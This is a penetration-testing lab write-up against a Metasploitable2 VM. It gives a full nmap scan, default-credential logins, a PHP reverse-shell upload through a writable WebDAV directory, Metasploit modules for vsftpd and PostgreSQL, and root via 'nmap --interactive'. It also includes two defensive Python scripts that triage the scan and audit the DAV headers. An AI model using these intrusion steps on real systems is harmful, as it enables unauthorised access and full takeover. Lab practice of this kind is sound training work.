• did arp-scan -l -I eth1 to get the IP 192.168.50.3 and set it as an env variable to make my life easier
  • nmap default scan results:
# Nmap 7.95 scan initiated Thu Sep  4 06:21:09 2025 as: /usr/lib/nmap/nmap -Pn -sCV -T4 -p- -oN Dscan.txt 192.168.50.3
Nmap scan report for 192.168.50.3
Host is up (0.0010s latency).
Not shown: 65505 closed tcp ports (reset)
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.50.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/udp   nfs
|   100005  1,2,3      34951/udp   mountd
|   100005  1,2,3      57805/tcp   mountd
|   100021  1,3,4      46473/tcp   nlockmgr
|   100021  1,3,4      51370/udp   nlockmgr
|   100024  1          33595/udp   status
|_  100024  1          41681/tcp   status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  shell       Netkit rshd
1099/tcp  open  java-rmi    GNU Classpath grmiregistry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 8
|   Capabilities flags: 43564
|   Some Capabilities: LongColumnFlag, SwitchToSSLAfterHandshake, Support41Auth, SupportsTransactions, Speaks41ProtocolNew, SupportsCompression, ConnectWithDatabase
|   Status: Autocommit
|_  Salt: h.IfEeN7f~giYa['N3S*
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2025-09-04T10:24:20+00:00; +8s from scanner time.
| ssl-cert: Subject: commonName=ubuntu804-base.localdomain/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/countryName=XX
| Not valid before: 2010-03-17T14:07:45
|_Not valid after:  2010-04-16T14:07:45
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
34651/tcp open  java-rmi    GNU Classpath grmiregistry
41681/tcp open  status      1 (RPC #100024)
46473/tcp open  nlockmgr    1-4 (RPC #100021)
57805/tcp open  mountd      1-3 (RPC #100005)
MAC Address: 00:0C:29:88:37:58 (VMware)
Service Info: Hosts:  metasploitable.localdomain, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
 
Host script results:
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: metasploitable
|   NetBIOS computer name: 
|   Domain name: localdomain
|   FQDN: metasploitable.localdomain
|_  System time: 2025-09-04T06:23:28-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
|_clock-skew: mean: 1h20m07s, deviation: 2h18m33s, median: 7s
|_nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Sep  4 06:24:50 2025 -- 1 IP address (1 host up) scanned in 220.13 seconds
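As an added example (not part of the original notes), a small triage script for the -oN output above: it walks the port table and NSE script lines and flags what a reviewer would flag by hand on this scan (cleartext/legacy services, anonymous FTP, the bindshell, SMB signing off). The sample is a constructed excerpt of the scan shown above; the full Dscan.txt parses the same way.

```python
import re

# Constructed excerpt of the nmap normal (-oN) output from the scan above.
SAMPLE_NMAP = """\
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
23/tcp    open  telnet      Linux telnetd
512/tcp   open  exec        netkit-rsh rexecd
514/tcp   open  shell       Netkit rshd
1524/tcp  open  bindshell   Metasploitable root shell
5900/tcp  open  vnc         VNC (protocol 3.3)
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)\s*(.*)$")

# Services that carry credentials or sessions in cleartext; any of these
# listening on a host is a finding on its own.
CLEARTEXT = {"ftp", "telnet", "exec", "login", "shell", "vnc"}

def triage(nmap_text):
    """Return a list of (port, severity, message) findings from -oN output."""
    findings = []
    current = None  # port the following NSE "|" lines belong to
    for line in nmap_text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, proto, svc, ver = m.groups()
            current = f"{port}/{proto}"
            if svc == "bindshell":
                findings.append((current, "critical", "unauthenticated root shell"))
            elif svc in CLEARTEXT:
                msg = f"cleartext service {svc}: {ver}".rstrip(": ")
                findings.append((current, "high", msg))
            continue
        if line.startswith("Host script results"):
            current = "host"  # host-level NSE output follows
        elif line.startswith("|") and "Anonymous FTP login allowed" in line:
            findings.append((current, "high", "anonymous FTP login allowed"))
        elif line.startswith("|") and "message_signing: disabled" in line:
            findings.append((current, "medium", "SMB signing disabled"))
    return findings
```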

Exploitation:

FTP1:

  • there's a Metasploit module for it. ran it and got root:

FTP2:

  • can also log in directly with the creds msfadmin:msfadmin

VNC:

  • logged in with vncviewer using the password msfadmin. gives root access immediately

Telnet:

  • do telnet <IP> and wait. it will ask for a password; enter msfadmin

HTTP:

  • barebones page with a lot to test. checked /dav (WebDAV): a directory listing
  • checked the allowed methods by sending an OPTIONS request over nc:
nc 192.168.50.3 80
OPTIONS http://192.168.50.2/ HTTP/1.0
host:192.168.50.2
 
  • the root page didn't return any extra methods. /dav returned this:
╭─[~/projects/CRTA/external]─[root@DEMONDAYZ]─[0]─[4250]
╰─[:)] # nc 192.168.50.3 80
OPTIONS http://192.168.50.3/dav/ HTTP/1.0
host:192.168.50.3
 
HTTP/1.1 200 OK
Date: Sun, 07 Sep 2025 09:57:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Content-Length: 0
Connection: close
Content-Type: httpd/unix-directory
  • PUT is allowed
  • used cadaver to upload a PHP reverse shell:
╭─[~/projects/CRTA/external]─[root@DEMONDAYZ]─[255]─[4253]
╰─[:(] # cadaver http://192.168.50.3/dav 
dav:/dav/> ls
Listing collection `/dav/': collection is empty.
dav:/dav/> put /usr/share/webshells/php/php-reverse-shell.php
Uploading /usr/share/webshells/php/php-reverse-shell.php to `/dav/php-reverse-shell.php':
Progress: [=============================>] 100.0% of 5494 bytes succeeded.
dav:/dav/> 
  • once the shell came back, used nmap to get root:
nmap --interactive
!sh
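As an added example (not from the original notes), an audit of the raw OPTIONS response captured above: it parses the status line and headers and reports whether DAV is on, whether TRACE is exposed, and which state-changing methods are advertised. Note the caveat the session above demonstrates: the Allow list for /dav/ omits PUT, yet the cadaver upload succeeded, so any advertised write method (DELETE, MOVE, COPY, PROPPATCH, ...) should be treated as "writable share", and the authoritative check is the Apache DAV/Limit configuration, not the header. The response text is a constructed copy of the one shown above.

```python
# Constructed copy of the OPTIONS response for /dav/ captured above.
DAV_RESPONSE = """\
HTTP/1.1 200 OK
Date: Sun, 07 Sep 2025 09:57:24 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
DAV: 1,2
DAV: <http://apache.org/dav/propset/fs/1>
MS-Author-Via: DAV
Allow: OPTIONS,GET,HEAD,POST,DELETE,TRACE,PROPFIND,PROPPATCH,COPY,MOVE,LOCK,UNLOCK
Content-Length: 0
Connection: close
Content-Type: httpd/unix-directory
"""

# Methods that change server-side state. Any of them advertised on an
# unauthenticated collection means the share is writable, whether or not
# PUT itself is listed (the capture above omits PUT but accepted an upload).
WRITE_METHODS = {"PUT", "DELETE", "MOVE", "COPY", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}

def parse_headers(raw):
    """Parse a raw HTTP response head into (status_code, {name: [values]})."""
    lines = raw.strip().splitlines()
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        # repeated headers (DAV appears twice here) are kept as a list
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return status, headers

def audit_dav(raw):
    """Summarise what an OPTIONS response reveals about a WebDAV location."""
    status, h = parse_headers(raw)
    allow = {m.strip().upper() for v in h.get("allow", []) for m in v.split(",")}
    return {
        "status": status,
        "dav_enabled": "dav" in h,
        "trace_enabled": "TRACE" in allow,
        "write_methods": sorted(allow & WRITE_METHODS),
        "put_listed": "PUT" in allow,
    }
```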

PostgreSQL:

  • ran msf exploit(linux/postgres/postgres_payload) to get a meterpreter shell as postgres
  • did the same nmap --interactive trick to get root